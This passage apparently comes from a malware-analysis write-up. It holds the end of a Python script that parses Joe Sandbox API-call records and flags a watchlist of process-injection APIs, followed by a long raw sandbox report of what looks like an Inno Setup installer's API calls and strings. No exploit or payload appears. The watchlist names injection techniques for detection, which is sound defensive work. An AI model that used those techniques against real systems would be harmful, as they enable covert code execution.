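• GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B88D
• ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DDBC,?,0046DF9D), ref: 0045D5BE
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
RESOLVERS = {"GetProcAddress"}

# Assumed watchlist: exports whose runtime resolution usually points at
# unpacking or injection rather than GUI plumbing. Extend as needed.
WATCHLIST = {
    "VirtualAlloc", "VirtualAllocEx", "VirtualProtect", "WriteProcessMemory",
    "CreateRemoteThread", "NtUnmapViewOfSection", "LdrLoadDll", "SetThreadContext",
}


def parse_api_lines(text):
    """Parse report API lines into call records, in report order.

    Non-matching lines (record headers, memory dump sources) are skipped
    instead of raising, because the report interleaves them with API lines.
    """
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        calls.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": [a.strip() for a in m.group("args").split(",")],
            "ref": m.group("ref"),
            "subcall": m.group("sub"),  # None when the call is direct
        })
    return calls


def resolve_dynamic_imports(calls):
    """Map each LoadLibrary target to the export names later passed to GetProcAddress.

    The module handle argument is printed as 00000000 in the report, so the
    library is attributed by call order: every GetProcAddress is charged to
    the most recent LoadLibrary. Resolutions seen before any LoadLibrary go
    to an "<unknown>" bucket (an assumed label).
    """
    resolved = OrderedDict()
    current = "<unknown>"
    for call in calls:
        if call["name"] in LOADERS and call["args"]:
            current = call["args"][0].lower()
            resolved.setdefault(current, [])
        elif call["name"] in RESOLVERS and len(call["args"]) >= 2:
            resolved.setdefault(current, []).append(call["args"][1])
    return resolved


def flag_watchlist(resolved, watchlist=WATCHLIST):
    """Return (library, export) pairs whose export name is on the watchlist."""
    return [(lib, name) for lib, names in resolved.items()
            for name in names if name in watchlist]


if __name__ == "__main__":
    imports = resolve_dynamic_imports(parse_api_lines(SAMPLE_APIS))
    for lib, names in imports.items():
        print(f"{lib}: {len(names)} exports resolved at runtime: {', '.join(names)}")
    hits = flag_watchlist(imports)
    print("watchlist hits:", hits if hits else "none (theme-drawing API only)")
```

To run it over a full report, paste the whole "APIs" section of every function record into `SAMPLE_APIS` (or read it from a file); the parser ignores the non-API lines, and the order-based attribution still holds as long as records are kept in the report's order.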
                                                                                                      APIs
                                                                                                        • Part of subcall function 0044B614: GetVersionExA.KERNEL32(00000094), ref: 0044B631
                                                                                                      • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                                                      • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                                                      • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7D9
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7EB
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7FD
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B80F
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B821
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B833
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B845
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B857
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B869
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B87B
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B88D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B89F
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8B1
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8C3
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8D5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8E7
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8F9
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B90B
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B91D
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B92F
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B941
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B953
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B965
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B977
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B989
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B99B
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B9AD
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9BF
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9D1
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoadVersion
                                                                                                      • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                      • API String ID: 1968650500-2910565190
                                                                                                      APIs
                                                                                                      • CreateMutexA.KERNEL32(00499B18,00000001,00000000,00000000,004584B9,?,?,?,00000001,?,004586D3,00000000,004586E9,?,00000000,0049B628), ref: 004581D1
                                                                                                      • CreateFileMappingA.KERNEL32(000000FF,00499B18,00000004,00000000,00002018,00000000), ref: 00458209
                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9,?,?,?), ref: 00458230
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045833D
                                                                                                      • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9), ref: 00458295
                                                                                                        • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                      • CloseHandle.KERNEL32(004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458354
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045838D
                                                                                                      • GetLastError.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045839F
                                                                                                      • UnmapViewOfFile.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458471
                                                                                                      • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458480
                                                                                                      • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458489
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                                                      • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                                      • API String ID: 4012871263-351310198
                                                                                                      APIs
                                                                                                      • 73A0A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                                                                      • 73A14C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                                                                      • 73A16180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                                                                      • 73A14C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                                                                      • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                                                                      • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                                                                      • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                                                                      • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                                                                      • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                                                                      • 73A14C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                                                                      • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                                                                      • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                                                                      • 73A08830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                                                                      • 73A022A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                                                                      • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                                                                      • 73A14D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                                                        • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                                      Similarity
                                                                                                      • API ID: Color$ObjectSelect$A022A08830Text$A16180A570DeleteFillRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 2377543522-0
                                                                                                      APIs
                                                                                                      • ShowWindow.USER32(?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000,004984F9,?,00000000), ref: 00497E23
                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000), ref: 00497E36
                                                                                                      • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000), ref: 00497E46
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00497E67
                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000), ref: 00497E77
                                                                                                        • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                      • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                                      • API String ID: 2000705611-3672972446
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,0045ACF8,?,?,?,?,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045ABAA
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                      • API String ID: 1452528299-3112430753
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32 ref: 0045CF3E
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CF5E
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CF6B
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CF78
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CF86
                                                                                                        • Part of subcall function 0045CE2C: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CECB,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CEA5
                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D03F
                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D048
                                                                                                      Strings
Similarity
• API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
• String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
• API String ID: 59345061-4263478283
• Opcode ID: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
• Instruction ID: 4ce31bb81caf279f5ed3d10c62bb09a2aad5f6c7ba3f26a8019cd68bbbdcec0a
• Opcode Fuzzy Hash: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
• Instruction Fuzzy Hash: E95193B1D00608EFDB10DFA9C845BAEBBB8EF48315F14806AF915B7381C2389945CF69
APIs
• CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,0045688D), ref: 00456592
• CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,0045688D), ref: 004565B8
• SysFreeString.OLEAUT32(?), ref: 00456745
Strings
• IPersistFile::Save, xrefs: 00456814
• IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 0045672A
• IShellLink::QueryInterface(IID_IPersistFile), xrefs: 004567B6
• IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004566A7
• IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566DB
• CoCreateInstance, xrefs: 004565C3
• IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 0045677C
• IPropertyStore::Commit, xrefs: 00456795
Similarity
• API ID: CreateInstance$FreeString
• String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
• API String ID: 308859552-3936712486
• Opcode ID: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
• Instruction ID: c99fdec92309fd26656a6f7ea9bd91ecf5cc306c054acb75a5569a06f28a4b2e
• Opcode Fuzzy Hash: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
• Instruction Fuzzy Hash: 29A13E71A00104AFDB50EFA9C885B9E7BF8EF09706F55406AF804E7252DB38DD48CB69
APIs
• 73A14C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
• 73A14C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
• GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
• 73A16180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
• 73A0A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
• 73A14C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
• 73A0A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
• SelectObject.GDI32(00000000,?), ref: 0041B480
• SelectObject.GDI32(?,00000000), ref: 0041B48F
• StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
• SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
• SelectObject.GDI32(?,00000000), ref: 0041B4D7
• DeleteDC.GDI32(00000000), ref: 0041B4E0
• DeleteDC.GDI32(?), ref: 0041B4E9
Similarity
• API ID: Object$Select$Delete$A16180A480A570Stretch
• String ID:
• API String ID: 3135053572-0
• Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
• Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
• Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
• Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
APIs
  • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472F70
• SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00473077
• SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0047308D
• SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 004730B2
Similarity
• API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
• String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
• API String ID: 971782779-3668018701
• Opcode ID: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
• Instruction ID: 1ded2309c22d90a9957aabde76cedeacc99048359e90752decbb9b8a0015ab1b
• Opcode Fuzzy Hash: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
• Instruction Fuzzy Hash: 8FD12574A00149AFDB01EFA9D581BDDBBF5AF08305F50806AF804B7392D778AE45CB69
APIs
  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
• RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,?,00000000,?,00000000,00454AF9,?,0045AECE,00000003,00000000,00000000,00454B30), ref: 00454979
  • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
• RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 004549FD
• RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 00454A2C
Strings
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454897
• RegOpenKeyEx, xrefs: 004548FC
• , xrefs: 004548EA
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548D0
Similarity
• API ID: QueryValue$FormatMessageOpen
• String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
• API String ID: 2812809588-1577016196
• Opcode ID: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
• Instruction ID: 44bd6ba1492406805f437c97fe518088f2f8e7c1bef0b67c8a01139b77ca8c69
• Opcode Fuzzy Hash: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
• Instruction Fuzzy Hash: C0911471944248ABDB10DFE5D942BDEB7FCEB48309F50406BF900FB282D6789E458B69
APIs
  • Part of subcall function 004596C8: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459863
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 004598CD
  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459934
Strings
• v4.0.30319, xrefs: 00459855
• .NET Framework not found, xrefs: 00459981
• SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00459816
• .NET Framework version %s not found, xrefs: 0045996D
• SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004598E7
• v2.0.50727, xrefs: 004598BF
• v1.1.4322, xrefs: 00459926
• SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00459880
Similarity
• API ID: Close$Open
• String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
• API String ID: 2976201327-446240816
• Opcode ID: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
• Instruction ID: 729b419896cd5506e065475e0ee5015c208a67e93f4f54458093df2d8724af3d
• Opcode Fuzzy Hash: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
• Instruction Fuzzy Hash: 0051A030A04145EBCB04DFA9C8A1BEE77B69B59305F54447FA841DB393D63D9E0E8B18
APIs
• CloseHandle.KERNEL32(?), ref: 00458DDF
• TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458DFB
• WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458E09
• GetExitCodeProcess.KERNEL32(?), ref: 00458E1A
• CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E61
• Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E7D
Strings
• Helper process exited, but failed to get exit code., xrefs: 00458E53
• Stopping 64-bit helper process. (PID: %u), xrefs: 00458DD1
• Helper process exited., xrefs: 00458E29
• Helper process exited with failure code: 0x%x, xrefs: 00458E47
• Helper isn't responding; killing it., xrefs: 00458DEB
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                      • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                      • API String ID: 3355656108-1243109208
                                                                                                      • Opcode ID: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                                                                      • Instruction ID: b06cb4cb11178ece3cea1db1bc2ca69ea432733d5239d7d0987fb8f0d427a68f
                                                                                                      • Opcode Fuzzy Hash: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                                                                      • Instruction Fuzzy Hash: D9216D706047009AD720E679C44275BB6E59F08709F04CC2FB999EB293DF78E8488B2A
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DDF4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 0045463B
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 00454777
                                                                                                        • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                                      Strings
                                                                                                      • , xrefs: 0045459D
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454553
                                                                                                      • RegCreateKeyEx, xrefs: 004545AF
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454583
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
